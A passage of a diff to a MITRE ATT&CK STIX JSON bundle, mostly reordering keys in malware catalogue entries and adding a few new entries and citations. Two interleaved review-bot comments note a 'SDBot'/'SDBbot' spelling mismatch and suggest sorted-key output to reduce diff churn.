],
- "x_mitre_version": "1.2",
- "x_mitre_contributors": [
- "Omkar Gudhate"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -193404,9 +222154,10 @@
],
"modified": "2020-03-30T02:09:54.540Z",
"created": "2017-05-31T21:32:58.738Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Martin Smolar, ESET"
],
+ "x_mitre_version": "1.3",
"x_mitre_aliases": [
"Epic",
"Tavdig",
@@ -193414,9 +222165,8 @@
"WorldCupSec",
"TadjMakhal"
],
- "x_mitre_version": "1.3",
- "x_mitre_contributors": [
- "Martin Smolar, ESET"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -193449,15 +222199,15 @@
],
"modified": "2020-03-30T16:22:06.314Z",
"created": "2019-06-28T17:40:32.217Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "ESET"
],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"EvilBunny"
],
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "ESET"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -193486,13 +222236,13 @@
],
"modified": "2020-03-30T16:22:54.155Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"EvilGrab"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--11194d8b-fdce-45d2-8047-df15bb8f16bd",
@@ -193524,15 +222274,28 @@
],
"modified": "2020-03-20T17:08:21.639Z",
"created": "2019-08-26T13:02:46.378Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_aliases": [
"Exaramel for Linux"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-01-30T15:10:03.894Z",
+ "modified": "2020-06-17T23:21:44.445Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "id": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5",
+ "name": "Exaramel for Windows",
+ "description": "[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "S0343",
@@ -193549,19 +222312,6 @@
"description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)",
- "name": "Exaramel for Windows",
- "id": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-30T02:10:54.652Z",
- "created": "2019-01-30T15:10:03.894Z",
"x_mitre_platforms": [
"Windows"
],
@@ -193600,13 +222350,13 @@
],
"modified": "2020-03-27T20:45:20.126Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"FALLCHILL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -193647,14 +222397,14 @@
],
"modified": "2020-03-30T16:23:47.799Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"FELIXROOT",
"GreyEnergy mini"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--43213480-78f7-4fb3-976f-d48f5f6a4c2a",
@@ -193682,13 +222432,13 @@
],
"modified": "2020-03-30T02:54:51.882Z",
"created": "2017-05-31T21:32:28.754Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"FLASHFLOOD"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -193720,15 +222470,21 @@
],
"modified": "2020-03-30T16:24:24.753Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"FLIPSIDE"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2017-05-31T21:32:52.470Z",
+ "modified": "2020-03-27T20:41:21.473Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -193748,19 +222504,13 @@
"name": "FakeM",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--bb3c1098-d654-4620-bf40-694386d28921",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-27T20:41:21.473Z",
- "created": "2017-05-31T21:32:52.470Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"FakeM"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1",
@@ -193797,15 +222547,21 @@
],
"modified": "2020-03-30T18:52:30.568Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Felismus"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2018-01-16T16:13:52.465Z",
+ "modified": "2020-03-30T15:32:08.360Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "FinFisher",
@@ -193853,21 +222609,15 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "type": "malware",
- "labels": [
- "malware"
+ "x_mitre_platforms": [
+ "Windows",
+ "Android"
],
- "modified": "2020-03-30T15:32:08.360Z",
- "created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.3",
"x_mitre_aliases": [
"FinFisher",
"FinSpy"
],
- "x_mitre_platforms": [
- "Windows",
- "Android"
- ]
+ "x_mitre_version": "1.3"
},
{
"external_references": [
@@ -193899,13 +222649,13 @@
],
"modified": "2020-03-30T16:41:11.166Z",
"created": "2019-01-31T00:23:06.022Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Final1stspy"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -193955,15 +222705,15 @@
],
"modified": "2020-03-30T16:41:41.805Z",
"created": "2017-05-31T21:33:21.973Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Flame",
"Flamer",
"sKyWIper"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -193991,13 +222741,13 @@
],
"modified": "2020-03-20T23:52:23.647Z",
"created": "2019-05-28T19:07:29.816Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"FlawedAmmyy"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -194025,13 +222775,13 @@
],
"modified": "2019-06-07T18:47:42.365Z",
"created": "2019-05-29T14:33:04.253Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"FlawedGrace"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -194063,13 +222813,13 @@
],
"modified": "2020-03-30T16:42:09.499Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"FruitFly"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "malware--50d6688b-0985-4f3d-8cbe-0c796b30703b",
@@ -194097,13 +222847,13 @@
],
"modified": "2020-03-20T18:11:27.347Z",
"created": "2019-09-12T17:40:38.303Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_aliases": [
"Fysbis"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f2e8c7a1-cae1-45c4-baf0-6f21bdcbb2c2",
@@ -194131,14 +222881,14 @@
],
"modified": "2020-03-30T16:42:52.248Z",
"created": "2017-05-31T21:32:20.526Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"GLOOXMAIL",
"Trojan.GTALK"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -194164,15 +222914,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-18T20:13:45.707Z",
+ "modified": "2020-06-23T19:20:45.892Z",
"created": "2019-10-11T17:29:20.165Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"GRIFFON"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--76abb3ef-dafd-4762-97cb-a35379429db4",
@@ -194213,17 +222963,17 @@
],
"modified": "2020-03-28T21:34:33.810Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Gazer",
- "WhiteBear"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Bartosz Jerzman"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "Gazer",
+ "WhiteBear"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--199463de-d9be-46d6-bb41-07234c1dd5a6",
@@ -194251,10 +223001,44 @@
],
"modified": "2020-03-30T16:43:20.186Z",
"created": "2017-05-31T21:32:36.177Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"GeminiDuke"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0460",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0460"
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)",
+ "name": "Get2",
+ "id": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-16T16:48:16.541Z",
+ "created": "2020-05-29T20:32:42.686Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Get2"
+ ],
"x_mitre_platforms": [
"Windows"
]
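Review bot: The Get2 `description` names the delivered payload `[SDBot](https://attack.mitre.org/software/S0461)`, but the Proofpoint reference cited in the same object is titled "TA505 Distributes New SDBbot Remote Access Trojan", so the display text and the source disagree. "SDBot" is also the common name of an older, unrelated IRC-bot family, so the spelling invites confusion for anyone searching the bundle by name; presumably S0461 is the SDBbot entry and only the link text is off. Suggest `[SDBbot](https://attack.mitre.org/software/S0461)` unless the S0461 object itself (outside this hunk) uses the "SDBot" spelling, in which case the two should at least be made consistent.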
@@ -194275,7 +223059,7 @@
"description": "(Citation: McAfee Gold Dragon)"
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
"source_name": "McAfee Gold Dragon"
}
@@ -194287,15 +223071,49 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T02:55:38.869Z",
+ "modified": "2020-04-21T23:09:31.063Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Gold Dragon"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)",
+ "name": "Goopy",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0477",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0477"
+ },
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-29T21:37:55.776Z",
+ "created": "2020-06-19T20:42:19.258Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Goopy"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--1d1fce2f-0db5-402b-9843-4278a0694637",
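Review bot: The new Goopy object writes its trailing keys in the order `x_mitre_platforms`, `x_mitre_aliases`, `x_mitre_version`, while the Get2 object added in the previous hunk uses `x_mitre_version`, `x_mitre_aliases`, `x_mitre_platforms`, and most of this diff is those same three keys swapping places in objects whose content did not change. Key order carries no meaning in STIX 2.0 JSON, so the churn only buries the substantive edits (new objects, new citations, changed and dropped URLs) that a reviewer needs to see. If this bundle is regenerated by a script, emitting it with sorted keys (`json.dump(bundle, fh, indent=4, sort_keys=True)`) or normalizing with `jq -S .` before committing would make future updates diff on content alone.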
@@ -194327,13 +223145,13 @@
],
"modified": "2020-03-30T20:44:34.524Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"GravityRAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -194365,13 +223183,13 @@
],
"modified": "2020-03-30T16:44:35.685Z",
"created": "2019-01-30T13:53:14.264Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"GreyEnergy"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--f8dfbc54-b070-4224-b560-79aaa5f835bd",
@@ -194399,13 +223217,13 @@
],
"modified": "2020-03-30T16:45:07.782Z",
"created": "2017-05-31T21:33:15.910Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"H1N1"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
@@ -194472,15 +223290,15 @@
],
"modified": "2020-03-30T16:45:38.272Z",
"created": "2017-05-31T21:32:29.203Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HAMMERTOSS",
"HammerDuke",
"NetDuke"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
@@ -194550,13 +223368,13 @@
],
"modified": "2020-03-30T19:45:04.248Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HARDRAIN"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -194588,13 +223406,13 @@
],
"modified": "2020-03-30T16:46:39.617Z",
"created": "2019-06-20T14:52:45.057Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"HAWKBALL"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b",
@@ -194622,14 +223440,14 @@
],
"modified": "2019-04-25T02:33:53.419Z",
"created": "2017-05-31T21:32:40.801Z",
- "x_mitre_version": "1.0",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HDoor",
"Custom HDoor"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.0"
},
{
"id": "malware--e669bb87-f773-4c7b-bfcc-a9ffebfdd8d4",
@@ -194662,13 +223480,13 @@
],
"modified": "2020-03-30T16:47:08.223Z",
"created": "2017-05-31T21:33:17.272Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HIDEDRV"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--7451bcf9-e6e6-4a70-bc3d-1599173d0035",
@@ -194700,13 +223518,13 @@
],
"modified": "2020-03-30T16:47:38.393Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HOMEFRY"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--454fe82d-6fd2-4ac6-91ab-28a33fe01369",
@@ -194738,13 +223556,13 @@
],
"modified": "2020-03-30T19:47:21.986Z",
"created": "2019-04-19T15:30:36.593Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HOPLIGHT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360",
@@ -194786,15 +223604,15 @@
],
"modified": "2020-03-20T02:22:13.185Z",
"created": "2017-05-31T21:32:46.445Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"HTTPBrowser",
"Token Control",
"HttpDump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--4b62ab58-c23b-4704-9c15-edd568cd59f8",
@@ -194822,10 +223640,10 @@
],
"modified": "2020-03-30T16:48:12.607Z",
"created": "2017-05-31T21:32:35.389Z",
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Hacking Team UEFI Rootkit"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--eff1a885-6f90-42a1-901f-eef6e7a1905e",
@@ -194857,16 +223675,16 @@
],
"modified": "2020-03-28T21:35:13.610Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Helminth"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Robert Falcone"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "Helminth"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--5967cc93-57c9-404a-8ffd-097edfa7bdfc",
@@ -194882,7 +223700,7 @@
{
"source_name": "Fidelis Hi-Zor",
"description": "Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.",
- "url": "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html"
+ "url": "https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/"
}
],
"object_marking_refs": [
@@ -194892,17 +223710,23 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T16:48:50.331Z",
+ "modified": "2020-05-13T22:56:22.295Z",
"created": "2017-05-31T21:32:56.860Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Hi-Zor"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-06-24T12:04:32.323Z",
+ "modified": "2020-03-26T20:35:27.505Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"external_references": [
{
"external_id": "S0394",
@@ -194926,25 +223750,19 @@
"description": "[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statistically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)",
"name": "HiddenWasp",
"id": "malware--fc774af4-533b-4724-96d2-ac1026316794",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-26T20:35:27.505Z",
- "created": "2019-06-24T12:04:32.323Z",
- "x_mitre_platforms": [
- "Linux"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"HiddenWasp"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux"
+ ]
},
{
"id": "malware--95047f03-4811-4300-922e-1ba937d53a61",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Hikit",
- "description": "[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise. (Citation: Novetta-Axiom)",
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise. (Citation: Novetta-Axiom) (Citation: FireEye Hikit Rootkit)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -194952,9 +223770,14 @@
"external_id": "S0009"
},
{
- "source_name": "Novetta-Axiom",
+ "url": "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.",
- "url": "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
+ "source_name": "Novetta-Axiom"
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
+ "source_name": "FireEye Hikit Rootkit"
}
],
"object_marking_refs": [
@@ -194964,15 +223787,57 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T16:49:30.272Z",
+ "modified": "2020-05-13T20:37:29.986Z",
"created": "2017-05-31T21:32:14.124Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Hikit"
+ "x_mitre_contributors": [
+ "Christopher Glyer, FireEye, @cglyer"
],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Hikit"
+ ],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "created": "2020-05-01T19:10:31.446Z",
+ "modified": "2020-05-06T19:28:21.746Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "id": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)",
+ "name": "HotCroissant",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0431",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0431"
+ },
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ },
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "HotCroissant"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--73a4793a-ce55-4159-b2a6-208ef29b326f",
@@ -195047,15 +223912,15 @@
],
"modified": "2020-03-30T16:50:01.217Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Hydraq",
"Aurora",
"9002 RAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -195069,19 +223934,19 @@
"description": "(Citation: Unit42 Emissary Panda May 2019)"
},
{
- "source_name": "Unit42 Emissary Panda May 2019",
+ "description": "Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.",
"url": "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "description": "Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019."
+ "source_name": "Unit42 Emissary Panda May 2019"
},
{
- "url": "https://securelist.com/luckymouse-hits-national-data-center/86083/",
+ "source_name": "Securelist LuckyMouse June 2018",
"description": "Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.",
- "source_name": "Securelist LuckyMouse June 2018"
+ "url": "https://securelist.com/luckymouse-hits-national-data-center/86083/"
},
{
- "url": "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html",
+ "source_name": "Hacker News LuckyMouse June 2018",
"description": "Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.",
- "source_name": "Hacker News LuckyMouse June 2018"
+ "url": "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html"
}
],
"object_marking_refs": [
@@ -195095,15 +223960,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T16:50:29.655Z",
+ "modified": "2020-06-23T00:20:31.733Z",
"created": "2019-07-09T17:42:44.777Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"HyperBro"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--5be33fef-39c0-4532-84ee-bea31e1b5324",
@@ -195135,16 +224000,16 @@
],
"modified": "2020-03-31T12:38:41.115Z",
"created": "2018-01-16T16:13:52.465Z",
